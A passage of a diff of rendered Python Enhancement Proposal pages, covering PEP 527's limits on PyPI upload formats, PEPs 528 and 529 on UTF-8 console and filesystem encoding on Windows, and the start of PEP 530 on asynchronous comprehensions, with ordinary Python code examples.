Python packaging is a multi-level ecosystem where PyPI is primarily suited and +used to distribute virtual environment compatible packages directly from their +respective project owners. These packages are then consumed either directly +by end-users, or by downstream distributors that take these packages and turn +them into their respective system level packages (such as RPM, deb, MSI, etc).

+

While PyPI itself only directly works with these Python specific but platform +agnostic packages, we encourage community-driven and commercial conversions of +these packages to downstream formats for particular target environments, like:

+
    +
  • The conda cross-platform data analysis ecosystem (conda-forge)
  • +
  • The deb based Linux ecosystem (Debian, Ubuntu, etc)
  • +
  • The RPM based Linux ecosystem (Fedora, openSuSE, Mageia, etc)
  • +
  • The homebrew, MacPorts and fink ecosystems for Mac OS X
  • +
  • The Windows Package Management ecosystem (NuGet, Chocolatey, etc)
  • +
  • 3rd party creation of Windows MSIs and installers (e.g. Christoph Gohlke’s +work at http://www.lfd.uci.edu/~gohlke/pythonlibs/ )
  • +
  • other commercial redistribution formats (ActiveState’s PyPM, Enthought +Canopy, etc)
  • +
  • other open source community redistribution formats (Nix, Gentoo, Arch, *BSD, +etc)
  • +
+

It is the belief of this PEP that the entire ecosystem is best supported by +keeping PyPI focused on the platform agnostic formats, where the limited amount +of time by volunteers can be best used instead of spreading the available time +out amongst several platforms. Further more, this PEP believes that the people +best positioned to provide well integrated packages for a particular platform +are people focused on that platform, and not across all possible platforms.

+
+

bdist_dumb

+

As it’s name implies, bdist_dumb is not a very complex format, however it +is so simple as to be worthless for actual usage.

+

For instance, if you’re using something like pyenv on macOS and you’re building +a library using Python 3.5, then bdist_dumb will produce a .tar.gz file +named something like exampleproject-1.0.macosx-10.11-x86_64.tar.gz. Right +off the bat this file name is somewhat difficult to differentiate from an +sdist since they both use the same file extension (and with the legacy pre +PEP 440 versions, 1.0-macosx-10.11-x86_64 is a valid, although quite silly, +version number). However, once you open up the created .tar.gz, you’d find +that there is no metadata inside that could be used for things like dependency +discovery and in fact, it is quite simply a tarball containing hardcoded paths +to wherever files would have been installed on the computer creating the +bdist_dumb. Going back to our pyenv on macOS example, this means that if I +created it, it would contain files like:

+

Users/dstufft/.pyenv/versions/3.5.2/lib/python3.5/site-packages/example.py

+
+
+

bdist_rpm

+

The bdist_rpm format on PyPI allows people to upload .rpm files for +end users to manually download by hand and then manually install by hand. +However, the common usage of rpm is with a specially designed repository +that allows automatic installation of dependencies, upgrades, etc which PyPI +does not provide. Thus, it is a type of file that is barely being used on PyPI +with only ~460 files of this type having been uploaded to PyPI (out a total of +662,544).

+

In addition, services like COPR provide +a better supported mechanism for publishing and using RPM files than we’re ever +likely to get on PyPI.

+
+
+

bdist_dmg, bdist_msi, and bdist_wininst

+

The bdist_dmg, bdist_msi, and bdist_winist formats are similar in +that they are an OS specific installer that will only install a library into an +environment and are not designed for real user facing installs of applications +(which would require things like bundling a Python interpreter and the like).

+

Out of these three, the usage for bdist_dmg and bdist_msi is very low, +with only ~500 bdist_msi files and ~50 bdist_dmg files having been +uploaded to PyPI. The bdist_wininst format has more use, with ~14,000 files +having ever been uploaded to PyPI.

+

It’s quite easy to look at the low usage of bdist_dmg and bdist_msi and +conclude that removing them will be fairly low impact, however +bdist_wininst has several orders of magnitude more usage. This is somewhat +misleading though, because although it has more people uploading those files +the actual usage of those uploaded files is fairly low. Taking a look at the +previous 30 days, we can see that 90% of all downloads of bdist_winist +files from PyPI were generated by the mirroring infrastructure and 7% of them +were generated by setuptools (which can currently be better covered by +bdist_egg files).

+

Given the small number of files uploaded for bdist_dmg and bdist_msi +and that bdist_wininst is largely existing to either consume bandwidth and +disk space via the mirroring infrastructure or could be trivially replaced +with bdist_egg, this PEP proposes to include these three formats in the +list of those to be disallowed.

+
+
+
+

File Extensions

+

Currently sdist supports a wide variety of file extensions like .tar.gz, +.tar, .tar.bz2, .tar.xz, .zip, .tar.Z, .tgz, and +.tbz. However, of those the only extensions which get anything more than +negligible usage is .tar.gz with 444,338 sdists currently, .zip with +58,774 sdists currently, and .tar.bz2 with 3,265 sdists currently.

+

Having multiple formats accepted requires tooling both within PyPI and outside +of PyPI to handle all of the various extensions that might be used (even if +nobody is currently using them). This doesn’t only affect PyPI, but ripples out +throughout the ecosystem. In addition, the different formats all have different +requirements for what optional C libraries Python was linked against and +different requirements for what versions of Python they support. In addition, +multiple formats also create a weird situation where there may be two +sdist files for a particular project/release with subtly different content.

+

It’s easy to advocate that anything outside of .tar.gz, .zip, and +.tar.bz2 should be disallowed. Outside of a tiny handful, nobody has +actively been uploading these other types of files in the ~15 years of PyPI’s +existence so they’ve obviously not been particularly useful. In addition, while +.tar.xz is theoretically a nicer format than the other .tar.* formats +due to the better compression ratio achieved by LZMA, it is only available in +Python 3.3+ and has an optional dependency on the lzma C library.

+

Looking at the three extensions we do have in current use, it’s also fairly +easy to conclude that .tar.bz2 can be disallowed as well. It has a fairly +small number of files ever uploaded with it and it requires an additional +optional C library to handle the bzip2 compression.

+

Finally we get down to .tar.gz and .zip. Looking at the pure numbers +for these two, we can see that .tar.gz is by far the most uploaded format, +with 444,338 total uploaded compared to .zip’s 58,774 and on POSIX +operating systems .tar.gz is also the default produced by all currently +released versions of Python and setuptools. In addition, these two file types +both use the same C library (zlib) which is also required for +bdist_wheel and bdist_egg. The two wrinkles with deciding between +.tar.gz and .zip is that while on POSIX operating systems .tar.gz +is the default, on Windows .zip is the default and the bdist_wheel +format also uses zip.

+

Instead of trying to standardize on either .tar.gz or .zip, this PEP +proposes that we allow either .tar.gz or .zip for sdists.

+
+
+

Limiting number of sdists per release

+

A sdist on PyPI should be a single source of truth for a particular release of +software. However, currently PyPI allows you to upload one sdist for each of +the sdist file extensions it allows. Currently this allows something like 10 +different sdists for a project, but even with this PEP it allows two different +sources of truth for a single version. Having multiple sdists oftentimes can +account for strange bugs that only expose themselves based on which sdist that +the person used.

+

To resolve this, this PEP proposes to allow one, and only one, sdist per +release of a project.

+
+
+
+

Removal Process

+

This PEP does NOT propose removing any existing files from PyPI, only +disallowing new ones from being uploaded. This restriction will be phased in on +a per-project basis to allow projects to adjust to the new restrictions where +applicable.

+

First, any existing projects will be flagged to allow legacy file types to be +uploaded, and any project without that flag (i.e. new projects) will not be +able to upload anything but sdist with a .tar.gz or .zip extension, +bdist_wheel, and bdist_egg. Then, any existing projects that have never +uploaded a file that requires the legacy file type flag will have that flag +removed, also making them fall under the new restrictions. Finally, an email +will be generated to the maintainers of all projects still given the legacy +flag, which will inform them of the upcoming new restrictions on uploads and +tell them that these restrictions will be applied to future uploads to their +projects starting in 1 month. Finally, after 1 month all projects will have the +legacy file type flag removed, and support for uploading these types of files +will cease to exist on PyPI.

+

This plan should provide minimal disruption since it does not remove any +existing files, and the types of files it does prevent from being uploaded are +either not particularly useful (or used) types of files or they can continue +to upload a similar type of file with a slight change to their process.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0527.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0528/index.html b/pep-0528/index.html new file mode 100644 index 00000000000..6ffab48c65c --- /dev/null +++ b/pep-0528/index.html @@ -0,0 +1,305 @@ + + + + + + + + PEP 528 – Change Windows console encoding to UTF-8 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 528 – Change Windows console encoding to UTF-8

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Aug-2016
+
Python-Version:
+
3.6
+
Post-History:
+
01-Sep-2016, 04-Sep-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Historically, Python uses the ANSI APIs for interacting with the Windows +operating system, often via C Runtime functions. However, these have been long +discouraged in favor of the UTF-16 APIs. Within the operating system, all text +is represented as UTF-16, and the ANSI APIs perform encoding and decoding using +the active code page.

+

This PEP proposes changing the default standard stream implementation on Windows +to use the Unicode APIs. This will allow users to print and input the full range +of Unicode characters at the default Windows console. This also requires a +subtle change to how the tokenizer parses text from readline hooks.

+
+
+

Specific Changes

+
+

Add _io.WindowsConsoleIO

+

Currently an instance of _io.FileIO is used to wrap the file descriptors +representing standard input, output and error. We add a new class (implemented +in C) _io.WindowsConsoleIO that acts as a raw IO object using the Windows +console functions, specifically, ReadConsoleW and WriteConsoleW.

+

This class will be used when the legacy-mode flag is not in effect, when opening +a standard stream by file descriptor and the stream is a console buffer rather +than a redirected file. Otherwise, _io.FileIO will be used as it is today.

+

This is a raw (bytes) IO class that requires text to be passed encoded with +utf-8, which will be decoded to utf-16-le and passed to the Windows APIs. +Similarly, bytes read from the class will be provided by the operating system as +utf-16-le and converted into utf-8 when returned to Python.

+

The use of an ASCII compatible encoding is required to maintain compatibility +with code that bypasses the TextIOWrapper and directly writes ASCII bytes to +the standard streams (for example, Twisted’s process_stdinreader.py). Code that assumes +a particular encoding for the standard streams other than ASCII will likely +break.

+
+
+

Add _PyOS_WindowsConsoleReadline

+

To allow Unicode entry at the interactive prompt, a new readline hook is +required. The existing PyOS_StdioReadline function will delegate to the new +_PyOS_WindowsConsoleReadline function when reading from a file descriptor +that is a console buffer and the legacy-mode flag is not in effect (the logic +should be identical to above).

+

Since the readline interface is required to return an 8-bit encoded string with +no embedded nulls, the _PyOS_WindowsConsoleReadline function transcodes from +utf-16-le as read from the operating system into utf-8.

+

The function PyRun_InteractiveOneObject which currently obtains the encoding +from sys.stdin will select utf-8 unless the legacy-mode flag is in effect. +This may require readline hooks to change their encodings to utf-8, or to +require legacy-mode for correct behaviour.

+
+
+

Add legacy mode

+

Launching Python with the environment variable PYTHONLEGACYWINDOWSSTDIO set +will enable the legacy-mode flag, which completely restores the previous +behaviour.

+
+
+
+

Alternative Approaches

+

The win_unicode_console package is a pure-Python alternative to changing the +default behaviour of the console. It implements essentially the same +modifications as described here using pure Python code.

+
+
+

Code that may break

+

The following code patterns may break or see different behaviour as a result of +this change. All of these code samples require explicitly choosing to use a raw +file object in place of a more convenient wrapper that would prevent any visible +change.

+
+

Assuming stdin/stdout encoding

+

Code that assumes that the encoding required by sys.stdin.buffer or +sys.stdout.buffer is 'mbcs' or a more specific encoding may currently be +working by chance, but could encounter issues under this change. For example:

+
>>> sys.stdout.buffer.write(text.encode('mbcs'))
+>>> r = sys.stdin.buffer.read(16).decode('cp437')
+
+
+

To correct this code, the encoding specified on the TextIOWrapper should be +used, either implicitly or explicitly:

+
>>> # Fix 1: Use wrapper correctly
+>>> sys.stdout.write(text)
+>>> r = sys.stdin.read(16)
+
+>>> # Fix 2: Use encoding explicitly
+>>> sys.stdout.buffer.write(text.encode(sys.stdout.encoding))
+>>> r = sys.stdin.buffer.read(16).decode(sys.stdin.encoding)
+
+
+
+
+

Incorrectly using the raw object

+

Code that uses the raw IO object and does not correctly handle partial reads and +writes may be affected. This is particularly important for reads, where the +number of characters read will never exceed one-fourth of the number of bytes +allowed, as there is no feasible way to prevent input from encoding as much +longer utf-8 strings:

+
>>> raw_stdin = sys.stdin.buffer.raw
+>>> data = raw_stdin.read(15)
+abcdefghijklm
+b'abc'
+# data contains at most 3 characters, and never more than 12 bytes
+# error, as "defghijklm\r\n" is passed to the interactive prompt
+
+
+

To correct this code, the buffered reader/writer should be used, or the caller +should continue reading until its buffer is full:

+
>>> # Fix 1: Use the buffered reader/writer
+>>> stdin = sys.stdin.buffer
+>>> data = stdin.read(15)
+abcedfghijklm
+b'abcdefghijklm\r\n'
+
+>>> # Fix 2: Loop until enough bytes have been read
+>>> raw_stdin = sys.stdin.buffer.raw
+>>> b = b''
+>>> while len(b) < 15:
+...     b += raw_stdin.read(15)
+abcedfghijklm
+b'abcdefghijklm\r\n'
+
+
+
+
+

Using the raw object with small buffers

+

Code that uses the raw IO object and attempts to read less than four characters +will now receive an error. Because it’s possible that any single character may +require up to four bytes when represented in utf-8, requests must fail:

+
>>> raw_stdin = sys.stdin.buffer.raw
+>>> data = raw_stdin.read(3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+ValueError: must read at least 4 bytes
+
+
+

The only workaround is to pass a larger buffer:

+
>>> # Fix: Request at least four bytes
+>>> raw_stdin = sys.stdin.buffer.raw
+>>> data = raw_stdin.read(4)
+a
+b'a'
+>>> >>>
+
+
+

(The extra >>> is due to the newline remaining in the input buffer and is +expected in this situation.)

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0528.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0529/index.html b/pep-0529/index.html new file mode 100644 index 00000000000..898a34ebda3 --- /dev/null +++ b/pep-0529/index.html @@ -0,0 +1,566 @@ + + + + + + + + PEP 529 – Change Windows filesystem encoding to UTF-8 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 529 – Change Windows filesystem encoding to UTF-8

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Aug-2016
+
Python-Version:
+
3.6
+
Post-History:
+
01-Sep-2016, 04-Sep-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Historically, Python uses the ANSI APIs for interacting with the Windows +operating system, often via C Runtime functions. However, these have been long +discouraged in favor of the UTF-16 APIs. Within the operating system, all text +is represented as UTF-16, and the ANSI APIs perform encoding and decoding using +the active code page. See Naming Files, Paths, and Namespaces for +more details.

+

This PEP proposes changing the default filesystem encoding on Windows to utf-8, +and changing all filesystem functions to use the Unicode APIs for filesystem +paths. This will not affect code that uses strings to represent paths, however +those that use bytes for paths will now be able to correctly round-trip all +valid paths in Windows filesystems. Currently, the conversions between Unicode +(in the OS) and bytes (in Python) were lossy and would fail to round-trip +characters outside of the user’s active code page.

+

Notably, this does not impact the encoding of the contents of files. These will +continue to default to locale.getpreferredencoding() (for text files) or +plain bytes (for binary files). This only affects the encoding used when users +pass a bytes object to Python where it is then passed to the operating system as +a path name.

+
+
+

Background

+

File system paths are almost universally represented as text with an encoding +determined by the file system. In Python, we expose these paths via a number of +interfaces, such as the os and io modules. Paths may be passed either +direction across these interfaces, that is, from the filesystem to the +application (for example, os.listdir()), or from the application to the +filesystem (for example, os.unlink()).

+

When paths are passed between the filesystem and the application, they are +either passed through as a bytes blob or converted to/from str using +os.fsencode() and os.fsdecode() or explicit encoding using +sys.getfilesystemencoding(). The result of encoding a string with +sys.getfilesystemencoding() is a blob of bytes in the native format for the +default file system.

+

On Windows, the native format for the filesystem is utf-16-le. The recommended +platform APIs for accessing the filesystem all accept and return text encoded in +this format. However, prior to Windows NT (and possibly further back), the +native format was a configurable machine option and a separate set of APIs +existed to accept this format. The option (the “active code page”) and these +APIs (the “*A functions”) still exist in recent versions of Windows for +backwards compatibility, though new functionality often only has a utf-16-le API +(the “*W functions”).

+

In Python, str is recommended because it can correctly round-trip all characters +used in paths (on POSIX with surrogateescape handling; on Windows because str +maps to the native representation). On Windows bytes cannot round-trip all +characters used in paths, as Python internally uses the *A functions and hence +the encoding is “whatever the active code page is”. Since the active code page +cannot represent all Unicode characters, the conversion of a path into bytes can +lose information without warning or any available indication.

+

As a demonstration of this:

+
>>> open('test\uAB00.txt', 'wb').close()
+>>> import glob
+>>> glob.glob('test*')
+['test\uab00.txt']
+>>> glob.glob(b'test*')
+[b'test?.txt']
+
+
+

The Unicode character in the second call to glob has been replaced by a ‘?’, +which means passing the path back into the filesystem will result in a +FileNotFoundError. The same results may be observed with os.listdir() or +any function that matches the return type to the parameter type.

+

While one user-accessible fix is to use str everywhere, POSIX systems generally +do not suffer from data loss when using bytes exclusively as the bytes are the +canonical representation. Even if the encoding is “incorrect” by some standard, +the file system will still map the bytes back to the file. Making use of this +avoids the cost of decoding and reencoding, such that (theoretically, and only +on POSIX), code such as this may be faster because of the use of b'.' +compared to using '.':

+
>>> for f in os.listdir(b'.'):
+...     os.stat(f)
+...
+
+
+

As a result, POSIX-focused library authors prefer to use bytes to represent +paths. For some authors it is also a convenience, as their code may receive +bytes already known to be encoded correctly, while others are attempting to +simplify porting their code from Python 2. However, the correctness assumptions +do not carry over to Windows where Unicode is the canonical representation, and +errors may result. This potential data loss is why the use of bytes paths on +Windows was deprecated in Python 3.3 - all of the above code snippets produce +deprecation warnings on Windows.

+
+
+

Proposal

+

Currently the default filesystem encoding is ‘mbcs’, which is a meta-encoder +that uses the active code page. However, when bytes are passed to the filesystem +they go through the *A APIs and the operating system handles encoding. In this +case, paths are always encoded using the equivalent of ‘mbcs:replace’ with no +opportunity for Python to override or change this.

+

This proposal would remove all use of the *A APIs and only ever call the *W +APIs. When Windows returns paths to Python as str, they will be decoded from +utf-16-le and returned as text (in whatever the minimal representation is). When +Python code requests paths as bytes, the paths will be transcoded from +utf-16-le into utf-8 using surrogatepass (Windows does not validate surrogate +pairs, so it is possible to have invalid surrogates in filenames). Equally, when +paths are provided as bytes, they are transcoded from utf-8 into utf-16-le +and passed to the *W APIs.

+

The use of utf-8 will not be configurable, except for the provision of a +“legacy mode” flag to revert to the previous behaviour.

+

The surrogateescape error mode does not apply here, as the concern is not +about retaining nonsensical bytes. Any path returned from the operating system +will be valid Unicode, while invalid paths created by the user should raise a +decoding error (currently these would raise OSError or a subclass).

+

The choice of utf-8 bytes (as opposed to utf-16-le bytes) is to ensure the +ability to round-trip path names and allow basic manipulation (for example, +using the os.path module) when assuming an ASCII-compatible encoding. Using +utf-16-le as the encoding is more pure, but will cause more issues than are +resolved.

+

This change would also undeprecate the use of bytes paths on Windows. No change +to the semantics of using bytes as a path is required - as before, they must be +encoded with the encoding specified by sys.getfilesystemencoding().

+
+
+

Specific Changes

+
+

Update sys.getfilesystemencoding

+

Remove the default value for Py_FileSystemDefaultEncoding and set it in +initfsencoding() to utf-8, or if the legacy-mode switch is enabled to mbcs.

+

Update the implementations of PyUnicode_DecodeFSDefaultAndSize() and +PyUnicode_EncodeFSDefault() to use the utf-8 codec, or if the legacy-mode +switch is enabled the existing mbcs codec.

+
+
+

Add sys.getfilesystemencodeerrors

+

As the error mode may now change between surrogatepass and replace, +Python code that manually performs encoding also needs access to the current +error mode. This includes the implementation of os.fsencode() and +os.fsdecode(), which currently assume an error mode based on the codec.

+

Add a public Py_FileSystemDefaultEncodeErrors, similar to the existing +Py_FileSystemDefaultEncoding. The default value on Windows will be +surrogatepass or in legacy mode, replace. The default value on all other +platforms will be surrogateescape.

+

Add a public sys.getfilesystemencodeerrors() function that returns the +current error mode.

+

Update the implementations of PyUnicode_DecodeFSDefaultAndSize() and +PyUnicode_EncodeFSDefault() to use the variable for error mode rather than +constant strings.

+

Update the implementations of os.fsencode() and os.fsdecode() to use +sys.getfilesystemencodeerrors() instead of assuming the mode.

+
+
+

Update path_converter

+

Update the path converter to always decode bytes or buffer objects into text +using PyUnicode_DecodeFSDefaultAndSize().

+

Change the narrow field from a char* string into a flag that indicates +whether the original object was bytes. This is required for functions that need +to return paths using the same type as was originally provided.

+
+
+

Remove unused ANSI code

+

Remove all code paths using the narrow field, as these will no longer be +reachable by any caller. These are only used within posixmodule.c. Other +uses of paths should have use of bytes paths replaced with decoding and use of +the *W APIs.

+
+
+

Add legacy mode

+

Add a legacy mode flag, enabled by the environment variable +PYTHONLEGACYWINDOWSFSENCODING or by a function call to +sys._enablelegacywindowsfsencoding(). The function call can only be +used to enable the flag and should be used by programs as close to +initialization as possible. Legacy mode cannot be disabled while Python is +running.

+

When this flag is set, the default filesystem encoding is set to mbcs rather +than utf-8, and the error mode is set to replace rather than +surrogatepass. Paths will continue to decode to wide characters and only *W +APIs will be called, however, the bytes passed in and received from Python will +be encoded the same as prior to this change.

+
+
+

Undeprecate bytes paths on Windows

+

Using bytes as paths on Windows is currently deprecated. We would announce that +this is no longer the case, and that paths when encoded as bytes should use +whatever is returned from sys.getfilesystemencoding() rather than the user’s +active code page.

+
+
+

Beta experiment

+

To assist with determining the impact of this change, we propose applying it to +3.6.0b1 provisionally with the intent being to make a final decision before +3.6.0b4.

+

During the experiment period, decoding and encoding exception messages will be +expanded to include a link to an active online discussion and encourage +reporting of problems.

+

If it is decided to revert the functionality for 3.6.0b4, the implementation +change would be to permanently enable the legacy mode flag, change the +environment variable to PYTHONWINDOWSUTF8FSENCODING and function to +sys._enablewindowsutf8fsencoding() to allow enabling the functionality +on a case-by-case basis, as opposed to disabling it.

+

It is expected that if we cannot feasibly make the change for 3.6 due to +compatibility concerns, it will not be possible to make the change at any later +time in Python 3.x.

+
+
+

Affected Modules

+

This PEP implicitly includes all modules within the Python that either pass path +names to the operating system, or otherwise use sys.getfilesystemencoding().

+

As of 3.6.0a4, the following modules require modification:

+
    +
  • os
  • +
  • _overlapped
  • +
  • _socket
  • +
  • subprocess
  • +
  • zipimport
  • +
+

The following modules use sys.getfilesystemencoding() but do not need +modification:

+
    +
  • gc (already assumes bytes are utf-8)
  • +
  • grp (not compiled for Windows)
  • +
  • http.server (correctly includes codec name with transmitted data)
  • +
  • idlelib.editor (should not be needed; has fallback handling)
  • +
  • nis (not compiled for Windows)
  • +
  • pwd (not compiled for Windows)
  • +
  • spwd (not compiled for Windows)
  • +
  • _ssl (only used for ASCII constants)
  • +
  • tarfile (code unused on Windows)
  • +
  • _tkinter (already assumes bytes are utf-8)
  • +
  • wsgiref (assumed as the default encoding for unknown environments)
  • +
  • zipapp (code unused on Windows)
  • +
+

The following native code uses one of the encoding or decoding functions, but do +not require any modification:

+
    +
  • Parser/parsetok.c (docs already specify sys.getfilesystemencoding())
  • +
  • Python/ast.c (docs already specify sys.getfilesystemencoding())
  • +
  • Python/compile.c (undocumented, but Python filesystem encoding implied)
  • +
  • Python/errors.c (docs already specify os.fsdecode())
  • +
  • Python/fileutils.c (code unused on Windows)
  • +
  • Python/future.c (undocumented, but Python filesystem encoding implied)
  • +
  • Python/import.c (docs already specify utf-8)
  • +
  • Python/importdl.c (code unused on Windows)
  • +
  • Python/pythonrun.c (docs already specify sys.getfilesystemencoding())
  • +
  • Python/symtable.c (undocumented, but Python filesystem encoding implied)
  • +
  • Python/thread.c (code unused on Windows)
  • +
  • Python/traceback.c (encodes correctly for comparing strings)
  • +
  • Python/_warnings.c (docs already specify os.fsdecode())
  • +
+
+
+
+

Rejected Alternatives

+
+

Use strict mbcs decoding

+

This is essentially the same as the proposed change, but instead of changing +sys.getfilesystemencoding() to utf-8 it is changed to mbcs (which +dynamically maps to the active code page).

+

This approach allows the use of new functionality that is only available as *W +APIs and also detection of encoding/decoding errors. For example, rather than +silently replacing Unicode characters with ‘?’, it would be possible to warn or +fail the operation.

+

Compared to the proposed fix, this could enable some new functionality but does +not fix any of the problems described initially. New runtime errors may cause +some problems to be more obvious and lead to fixes, provided library maintainers +are interested in supporting Windows and adding a separate code path to treat +filesystem paths as strings.

+

Making the encoding mbcs without strict errors is equivalent to the legacy-mode +switch being enabled by default. This is a possible course of action if there is +significant breakage of actual code and a need to extend the deprecation period, +but still a desire to have the simplifications to the CPython source.

+
+
+

Make bytes paths an error on Windows

+

By preventing the use of bytes paths on Windows completely we prevent users from +hitting encoding issues.

+

However, the motivation for this PEP is to increase the likelihood that code +written on POSIX will also work correctly on Windows. This alternative would +move the other direction and make such code completely incompatible. As this +does not benefit users in any way, we reject it.

+
+
+

Make bytes paths an error on all platforms

+

By deprecating and then disable the use of bytes paths on all platforms we +prevent users from hitting encoding issues regardless of where the code was +originally written. This would require a full deprecation cycle, as there are +currently no warnings on platforms other than Windows.

+

This is likely to be seen as a hostile action against Python developers in +general, and as such is rejected at this time.

+
+
+
+

Code that may break

+

The following code patterns may break or see different behaviour as a result of +this change. Each of these examples would have been fragile in code intended for +cross-platform use. The suggested fixes demonstrate the most compatible way to +handle path encoding issues across all platforms and across multiple Python +versions.

+

Note that all of these examples produce deprecation warnings on Python 3.3 and +later.

+
+

Not managing encodings across boundaries

+

Code that does not manage encodings when crossing protocol boundaries may +currently be working by chance, but could encounter issues when either encoding +changes. Note that the source of filename may be any function that returns +a bytes object, as illustrated in a second example below:

+
>>> filename = open('filename_in_mbcs.txt', 'rb').read()
+>>> text = open(filename, 'r').read()
+
+
+

To correct this code, the encoding of the bytes in filename should be +specified, either when reading from the file or before using the value:

+
>>> # Fix 1: Open file as text (default encoding)
+>>> filename = open('filename_in_mbcs.txt', 'r').read()
+>>> text = open(filename, 'r').read()
+
+>>> # Fix 2: Open file as text (explicit encoding)
+>>> filename = open('filename_in_mbcs.txt', 'r', encoding='mbcs').read()
+>>> text = open(filename, 'r').read()
+
+>>> # Fix 3: Explicitly decode the path
+>>> filename = open('filename_in_mbcs.txt', 'rb').read()
+>>> text = open(filename.decode('mbcs'), 'r').read()
+
+
+

Where the creator of filename is separated from the user of filename, +the encoding is important information to include:

+
>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'.encode('mbcs')
+
+>>> filename = some_object.filename
+>>> type(filename)
+<class 'bytes'>
+>>> text = open(filename, 'r').read()
+
+
+

To fix this code for best compatibility across operating systems and Python +versions, the filename should be exposed as str:

+
>>> # Fix 1: Expose as str
+>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'
+
+>>> filename = some_object.filename
+>>> type(filename)
+<class 'str'>
+>>> text = open(filename, 'r').read()
+
+
+

Alternatively, the encoding used for the path needs to be made available to the +user. Specifying os.fsencode() (or sys.getfilesystemencoding()) is an +acceptable choice, or a new attribute could be added with the exact encoding:

+
>>> # Fix 2: Use fsencode
+>>> some_object.filename = os.fsencode(r'C:\Users\Steve\Documents\my_file.txt')
+
+>>> filename = some_object.filename
+>>> type(filename)
+<class 'bytes'>
+>>> text = open(filename, 'r').read()
+
+
+>>> # Fix 3: Expose as explicit encoding
+>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'.encode('cp437')
+>>> some_object.filename_encoding = 'cp437'
+
+>>> filename = some_object.filename
+>>> type(filename)
+<class 'bytes'>
+>>> filename = filename.decode(some_object.filename_encoding)
+>>> type(filename)
+<class 'str'>
+>>> text = open(filename, 'r').read()
+
+
+
+
+

Explicitly using ‘mbcs’

+

Code that explicitly encodes text using ‘mbcs’ before passing to file system +APIs is now passing incorrectly encoded bytes. Note that the source of +filename in this example is not relevant, provided that it is a str:

+
>>> filename = open('files.txt', 'r').readline().rstrip()
+>>> text = open(filename.encode('mbcs'), 'r')
+
+
+

To correct this code, the string should be passed without explicit encoding, or +should use os.fsencode():

+
>>> # Fix 1: Do not encode the string
+>>> filename = open('files.txt', 'r').readline().rstrip()
+>>> text = open(filename, 'r')
+
+>>> # Fix 2: Use correct encoding
+>>> filename = open('files.txt', 'r').readline().rstrip()
+>>> text = open(os.fsencode(filename), 'r')
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0529.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0530/index.html b/pep-0530/index.html new file mode 100644 index 00000000000..ff7b6838e21 --- /dev/null +++ b/pep-0530/index.html @@ -0,0 +1,285 @@ + + + + + + + + PEP 530 – Asynchronous Comprehensions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 530 – Asynchronous Comprehensions

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
03-Sep-2016
+
Python-Version:
+
3.6
+
Post-History:
+
03-Sep-2016
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 492 and PEP 525 introduce support for native coroutines and +asynchronous generators using async / await syntax. This PEP +proposes to add asynchronous versions of list, set, dict comprehensions +and generator expressions.

+
+
+

Rationale and Goals

+

Python has extensive support for synchronous comprehensions, allowing +to produce lists, dicts, and sets with a simple and concise syntax. We +propose implementing similar syntactic constructions for the +asynchronous code.

+

To illustrate the readability improvement, consider the following +example:

+
result = []
+async for i in aiter():
+    if i % 2:
+        result.append(i)
+
+
+

With the proposed asynchronous comprehensions syntax, the above code +becomes as short as:

+
result = [i async for i in aiter() if i % 2]
+
+
+

The PEP also makes it possible to use the await expressions in +all kinds of comprehensions:

+
result = [await fun() for fun in funcs]
+
+
+
+
+

Specification

+
+

Asynchronous Comprehensions

+

We propose to allow using async for inside list, set and dict +comprehensions. Pending PEP 525 approval, we can also allow creation +of asynchronous generator expressions.

+

Examples:

+
    +
  • set comprehension: {i async for i in agen()};
  • +
  • list comprehension: [i async for i in agen()];
  • +
  • dict comprehension: {i: i ** 2 async for i in agen()};
  • +
  • generator expression: (i ** 2 async for i in agen()).
  • +
+

It is allowed to use async for along with if and for +clauses in asynchronous comprehensions and generator expressions:

+
dataset = {data for line in aiter()
+                async for data in line
+                if check(data)}
+
+
+

Asynchronous comprehensions are only allowed inside an async def +function.

+

In principle, asynchronous generator expressions are allowed in +any context. However, in Python 3.6, due to async and await +soft-keyword status, asynchronous generator expressions are only +allowed in an async def function. Once async and await +become reserved keywords in Python 3.7, this restriction will be +removed.

+
+
+

await in Comprehensions

+

We propose to allow the use of await expressions in both +asynchronous and synchronous comprehensions:

+
result = [await fun() for fun in funcs]
+result = {await fun() for fun in funcs}
+result = {fun: await fun() for fun in funcs}
+
+result = [await fun() for fun in funcs if await smth]
+result = {await fun() for fun in funcs if await smth}
+result = {fun: await fun() for fun in funcs if await smth}
+
+result = [await fun() async for fun in funcs]
